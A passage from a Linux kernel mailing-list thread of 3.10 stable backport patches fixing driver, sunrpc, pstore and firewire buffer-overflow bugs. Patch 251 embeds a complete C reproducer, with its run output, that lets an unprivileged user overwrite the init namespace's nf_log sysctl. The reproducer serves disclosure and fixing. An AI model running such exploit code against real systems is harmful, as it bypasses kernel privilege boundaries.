+	memcpy(&txq->scratchbufs[idx], &out_cmd->hdr, scratch_size);
 	iwl_pcie_txq_build_tfd(trans, txq,
-			       iwl_pcie_get_scratchbuf_dma(txq, q->write_ptr),
+			       iwl_pcie_get_scratchbuf_dma(txq, idx),
 			       scratch_size, 1);
 
 	/* map first command fragment, if any remains */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (141 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill Willy Tarreau
                   ` (75 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chuck Lever, Anna Schumaker, Willy Tarreau

From: Chuck Lever <chuck.lever@oracle.com>

commit 0533b13072f4bf35738290d2cf9e299c7bc6c42a upstream.

If an RPC program does not set vs_dispatch and pc_func() returns
rpc_drop_reply, the server sends a reply anyway containing a single
word containing the value RPC_DROP_REPLY (in network byte-order, of
course). This is a nonsense RPC message.

Fixes: 9e701c610923 ("svcrpc: simpler request dropping")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sunrpc/svc.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
index 6dee8fb..c996a71 100644
--- a/net/sunrpc/svc.c
+++ b/net/sunrpc/svc.c
@@ -1182,7 +1182,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
 		*statp = procp->pc_func(rqstp, rqstp->rq_argp, rqstp->rq_resp);
 
 		/* Encode reply */
-		if (rqstp->rq_dropme) {
+		if (*statp == rpc_drop_reply ||
+		    rqstp->rq_dropme) {
 			if (procp->pc_release)
 				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
 			goto dropit;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (142 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() Willy Tarreau
                   ` (74 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Florian Fainelli, Kalle Valo, Willy Tarreau

From: Florian Fainelli <f.fainelli@gmail.com>

commit 5c5fa1f464ac954982df1d96b9f9a5103d21aedd upstream.

In case dma_mapping_error() returns an error in dma_rxfill, we would be
leaking a packet that we allocated with brcmu_pkt_buf_get_skb().

Reported-by: coverity (CID 1081819)
Fixes: 67d0cf50bd32 ("brcmsmac: Fix WARNING caused by lack of calls to dma_mapping_error()")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Arend van Spriel <arend@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmsmac/dma.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/dma.c b/drivers/net/wireless/brcm80211/brcmsmac/dma.c
index 4fb9635..7660b52 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/dma.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/dma.c
@@ -1079,8 +1079,10 @@ bool dma_rxfill(struct dma_pub *pub)
 
 		pa = dma_map_single(di->dmadev, p->data, di->rxbufsize,
 				    DMA_FROM_DEVICE);
-		if (dma_mapping_error(di->dmadev, pa))
+		if (dma_mapping_error(di->dmadev, pa)) {
+			brcmu_pkt_buf_free_skb(p);
 			return false;
+		}
 
 		/* save the free packet pointer */
 		di->rxp[rxout] = p;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (143 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() Willy Tarreau
                   ` (73 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Florian Fainelli, Kalle Valo, Willy Tarreau

From: Florian Fainelli <f.fainelli@gmail.com>

commit f823a2aa8f4674c095a5413b9e3ba12d82df06f2 upstream.

wlc_phy_txpower_get_current() does a logical OR of power->flags, which
presumes that power.flags was initiliazed earlier by the caller,
unfortunately, this is not the case, so make sure we zero out the struct
tx_power before calling into wlc_phy_txpower_get_current().

Reported-by: coverity (CID 146011)
Fixes: 5b435de0d7868 ("net: wireless: add brcm80211 drivers")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmsmac/stf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/stf.c b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
index dd91627..0ab865d 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/stf.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
@@ -87,7 +87,7 @@ void
 brcms_c_stf_ss_algo_channel_get(struct brcms_c_info *wlc, u16 *ss_algo_channel,
 			    u16 chanspec)
 {
-	struct tx_power power;
+	struct tx_power power = { };
 	u8 siso_mcs_id, cdd_mcs_id, stbc_mcs_id;
 
 	/* Clear previous settings */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (144 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size Willy Tarreau
                   ` (72 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Arend Van Spriel, Kalle Valo, Willy Tarreau

From: Arend Van Spriel <arend.vanspriel@broadcom.com>

commit ded89912156b1a47d940a0c954c43afbabd0c42c upstream.

User-space can choose to omit NL80211_ATTR_SSID and only provide raw
IE TLV data. When doing so it can provide SSID IE with length exceeding
the allowed size. The driver further processes this IE copying it
into a local variable without checking the length. Hence stack can be
corrupted and used as exploit.

Reported-by: Daxing Guo <freener.gdx@gmail.com>
Reviewed-by: Hante Meuleman <hante.meuleman@broadcom.com>
Reviewed-by: Pieter-Paul Giesberts <pieter-paul.giesberts@broadcom.com>
Reviewed-by: Franky Lin <franky.lin@broadcom.com>
Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
index 301e572..2c52430 100644
--- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
@@ -3726,7 +3726,7 @@ brcmf_cfg80211_start_ap(struct wiphy *wiphy, struct net_device *ndev,
 				(u8 *)&settings->beacon.head[ie_offset],
 				settings->beacon.head_len - ie_offset,
 				WLAN_EID_SSID);
-		if (!ssid_ie)
+		if (!ssid_ie || ssid_ie->len > IEEE80211_MAX_SSID_LEN)
 			return -EINVAL;
 
 		memcpy(ssid_le.SSID, ssid_ie->data, ssid_ie->len);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (145 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero Willy Tarreau
                   ` (71 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Liu ShuoX, Tony Luck, Willy Tarreau

From: Liu ShuoX <shuox.liu@intel.com>

commit 017321cf390045dd4c4afc4a232995ea50bcf66d upstream.

In case new offset is equal to prz->buffer_size, it won't wrap at this
time and will return old(overflow) value next time.

Signed-off-by: Liu ShuoX <shuox.liu@intel.com>
Acked-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Tony Luck <tony.luck@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index bda61a7..0b367ef 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -54,7 +54,7 @@ static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a)
 	do {
 		old = atomic_read(&prz->buffer->start);
 		new = old + a;
-		while (unlikely(new > prz->buffer_size))
+		while (unlikely(new >= prz->buffer_size))
 			new -= prz->buffer_size;
 	} while (atomic_cmpxchg(&prz->buffer->start, old, new) != old);
 
@@ -91,7 +91,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
 
 	old = atomic_read(&prz->buffer->start);
 	new = old + a;
-	while (unlikely(new > prz->buffer_size))
+	while (unlikely(new >= prz->buffer_size))
 		new -= prz->buffer_size;
 	atomic_set(&prz->buffer->start, new);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (146 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows Willy Tarreau
                   ` (70 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jack Morgenstein, David S . Miller, Juerg Haefliger, Willy Tarreau

From: Jack Morgenstein <jackm@dev.mellanox.co.il>

commit 6e5224224faa50ec4c8949dcefadf895e565f0d1 upstream.

The VF administrative mac addresses (stored in the PF driver) are
initialized to zero when the PF driver starts up.

These addresses may be modified in the PF driver through ndo calls
initiated by iproute2 or libvirt.

While we allow the PF/host to change the VF admin mac address from zero
to a valid unicast mac, we do not allow restoring the VF admin mac to
zero. We currently only allow changing this mac to a different unicast mac.

This leads to problems when libvirt scripts are used to deal with
VF mac addresses, and libvirt attempts to revoke the mac so this
host will not use it anymore.

Fix this by allowing resetting a VF administrative MAC back to zero.

Fixes: 8f7ba3ca12f6 ('net/mlx4: Add set VF mac address support')
Signed-off-by: Jack Morgenstein <jackm@dev.mellanox.co.il>
Reported-by: Moshe Levi <moshele@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Juerg Haefliger <juerg.haefliger@hpe.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/ethernet/mellanox/mlx4/en_netdev.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
index 063f3f4..a206ce6 100644
--- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
+++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
@@ -2027,7 +2027,7 @@ static int mlx4_en_set_vf_mac(struct net_device *dev, int queue, u8 *mac)
 	struct mlx4_en_dev *mdev = en_priv->mdev;
 	u64 mac_u64 = mlx4_en_mac_to_u64(mac);
 
-	if (!is_valid_ether_addr(mac))
+	if (is_multicast_ether_addr(mac))
 		return -EINVAL;
 
 	return mlx4_set_vf_mac(mdev->dev, en_priv->port, queue, mac_u64);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (147 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
                   ` (69 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Stefan Richter, Willy Tarreau

From: Stefan Richter <stefanr@s5r6.in-berlin.de>

commit 667121ace9dbafb368618dbabcf07901c962ddac upstream.

The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams.  A maliciously formed fragment
with a respectively large datagram_offset would cause a memcpy past the
datagram buffer.

So, drop any packets carrying a fragment with offset + length larger
than datagram_size.

In addition, ensure that
  - GASP header, unfragmented encapsulation header, or fragment
    encapsulation header actually exists before we access it,
  - the encapsulated datagram or fragment is of nonzero size.

Reported-by: Eyal Itkin <eyal.itkin@gmail.com>
Reviewed-by: Eyal Itkin <eyal.itkin@gmail.com>
Fixes: CVE 2016-8633
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/firewire/net.c | 51 ++++++++++++++++++++++++++++++++++----------------
 1 file changed, 35 insertions(+), 16 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 7bdb6fe6..70a716e 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -591,6 +591,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 	int retval;
 	u16 ether_type;
 
+	if (len <= RFC2374_UNFRAG_HDR_SIZE)
+		return 0;
+
 	hdr.w0 = be32_to_cpu(buf[0]);
 	lf = fwnet_get_hdr_lf(&hdr);
 	if (lf == RFC2374_HDR_UNFRAG) {
@@ -615,7 +618,12 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 		return fwnet_finish_incoming_packet(net, skb, source_node_id,
 						    is_broadcast, ether_type);
 	}
+
 	/* A datagram fragment has been received, now the fun begins. */
+
+	if (len <= RFC2374_FRAG_HDR_SIZE)
+		return 0;
+
 	hdr.w1 = ntohl(buf[1]);
 	buf += 2;
 	len -= RFC2374_FRAG_HDR_SIZE;
@@ -629,6 +637,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 	datagram_label = fwnet_get_hdr_dgl(&hdr);
 	dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
 
+	if (fg_off + len > dg_size)
+		return 0;
+
 	spin_lock_irqsave(&dev->lock, flags);
 
 	peer = fwnet_peer_find_by_node_id(dev, source_node_id, generation);
@@ -735,6 +746,22 @@ static void fwnet_receive_packet(struct fw_card *card, struct fw_request *r,
 	fw_send_response(card, r, rcode);
 }
 
+static int gasp_source_id(__be32 *p)
+{
+	return be32_to_cpu(p[0]) >> 16;
+}
+
+static u32 gasp_specifier_id(__be32 *p)
+{
+	return (be32_to_cpu(p[0]) & 0xffff) << 8 |
+	       (be32_to_cpu(p[1]) & 0xff000000) >> 24;
+}
+
+static u32 gasp_version(__be32 *p)
+{
+	return be32_to_cpu(p[1]) & 0xffffff;
+}
+
 static void fwnet_receive_broadcast(struct fw_iso_context *context,
 		u32 cycle, size_t header_length, void *header, void *data)
 {
@@ -744,9 +771,6 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
 	__be32 *buf_ptr;
 	int retval;
 	u32 length;
-	u16 source_node_id;
-	u32 specifier_id;
-	u32 ver;
 	unsigned long offset;
 	unsigned long flags;
 
@@ -763,22 +787,17 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
 
 	spin_unlock_irqrestore(&dev->lock, flags);
 
-	specifier_id =    (be32_to_cpu(buf_ptr[0]) & 0xffff) << 8
-			| (be32_to_cpu(buf_ptr[1]) & 0xff000000) >> 24;
-	ver = be32_to_cpu(buf_ptr[1]) & 0xffffff;
-	source_node_id = be32_to_cpu(buf_ptr[0]) >> 16;
-
-	if (specifier_id == IANA_SPECIFIER_ID &&
-	    (ver == RFC2734_SW_VERSION
+	if (length > IEEE1394_GASP_HDR_SIZE &&
+	    gasp_specifier_id(buf_ptr) == IANA_SPECIFIER_ID &&
+	    (gasp_version(buf_ptr) == RFC2734_SW_VERSION
 #if IS_ENABLED(CONFIG_IPV6)
-	     || ver == RFC3146_SW_VERSION
+	     || gasp_version(buf_ptr) == RFC3146_SW_VERSION
 #endif
-	    )) {
-		buf_ptr += 2;
-		length -= IEEE1394_GASP_HDR_SIZE;
-		fwnet_incoming_packet(dev, buf_ptr, length, source_node_id,
+	    ))
+		fwnet_incoming_packet(dev, buf_ptr + 2,
+				      length - IEEE1394_GASP_HDR_SIZE,
+				      gasp_source_id(buf_ptr),
 				      context->card->generation, true);
-	}
 
 	packet.payload_length = dev->rcv_buffer_size;
 	packet.interrupt = 1;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (148 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
                   ` (68 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Stefan Richter, Willy Tarreau

From: Stefan Richter <stefanr@s5r6.in-berlin.de>

commit e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.

RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:

    datagram_size:  The encoded size of the entire IP datagram.  The
    value of datagram_size [...] SHALL be one less than the value of
    Total Length in the datagram's IP header (see STD 5, RFC 791).

Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:

    ether1394_tx() /* transmit */
        ether1394_encapsulate_prep()
            hdr->ff.dg_size = dg_size - 1;

    ether1394_data_handler() /* receive */
        if (hdr->common.lf == ETH1394_HDR_LF_FF)
            dg_size = hdr->ff.dg_size + 1;
        else
            dg_size = hdr->sf.dg_size + 1;

Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.

Only firewire-net sets and gets datagram_size without this offset.  The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394.  (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
  - from OS X fail entirely,
  - from Win XP start out with a bunch of fragmented datagrams which
    time out, then continue with unfragmented datagrams because Win XP
    temporarily reduces the MTU to 576 bytes.

So let's fix firewire-net's datagram_size accessors.

Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed.  (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)

Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/firewire/net.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 70a716e..1321319 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -73,13 +73,13 @@ struct rfc2734_header {
 
 #define fwnet_get_hdr_lf(h)		(((h)->w0 & 0xc0000000) >> 30)
 #define fwnet_get_hdr_ether_type(h)	(((h)->w0 & 0x0000ffff))
-#define fwnet_get_hdr_dg_size(h)	(((h)->w0 & 0x0fff0000) >> 16)
+#define fwnet_get_hdr_dg_size(h)	((((h)->w0 & 0x0fff0000) >> 16) + 1)
 #define fwnet_get_hdr_fg_off(h)		(((h)->w0 & 0x00000fff))
 #define fwnet_get_hdr_dgl(h)		(((h)->w1 & 0xffff0000) >> 16)
 
-#define fwnet_set_hdr_lf(lf)		((lf)  << 30)
+#define fwnet_set_hdr_lf(lf)		((lf) << 30)
 #define fwnet_set_hdr_ether_type(et)	(et)
-#define fwnet_set_hdr_dg_size(dgs)	((dgs) << 16)
+#define fwnet_set_hdr_dg_size(dgs)	(((dgs) - 1) << 16)
 #define fwnet_set_hdr_fg_off(fgo)	(fgo)
 
 #define fwnet_set_hdr_dgl(dgl)		((dgl) << 16)
@@ -635,7 +635,7 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 		fg_off = fwnet_get_hdr_fg_off(&hdr);
 	}
 	datagram_label = fwnet_get_hdr_dgl(&hdr);
-	dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
+	dg_size = fwnet_get_hdr_dg_size(&hdr);
 
 	if (fg_off + len > dg_size)
 		return 0;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (149 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
                   ` (67 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jann Horn, Pablo Neira Ayuso, Willy Tarreau

From: Jann Horn <jann@thejh.net>

commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/netfilter/nf_log.c | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index 3b18dd1..07ed65a 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -253,7 +253,7 @@ static int nf_log_proc_dostring(ctl_table *table, int write,
 	size_t size = *lenp;
 	int r = 0;
 	int tindex = (unsigned long)table->extra1;
-	struct net *net = current->nsproxy->net_ns;
+	struct net *net = table->extra2;
 
 	if (write) {
 		if (size > sizeof(buf))
@@ -306,7 +306,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 				 3, "%d", i);
 			nf_log_sysctl_table[i].procname	=
 				nf_log_sysctl_fnames[i];
-			nf_log_sysctl_table[i].data = NULL;
 			nf_log_sysctl_table[i].maxlen =
 				NFLOGGER_NAME_LEN * sizeof(char);
 			nf_log_sysctl_table[i].mode = 0644;
@@ -317,6 +316,9 @@ static int netfilter_log_sysctl_init(struct net *net)
 		}
 	}
 
+	for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+		table[i].extra2 = net;
+
 	net->nf.nf_log_dir_header = register_net_sysctl(net,
 						"net/netfilter/nf_log",
 						table);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (150 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
                   ` (66 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
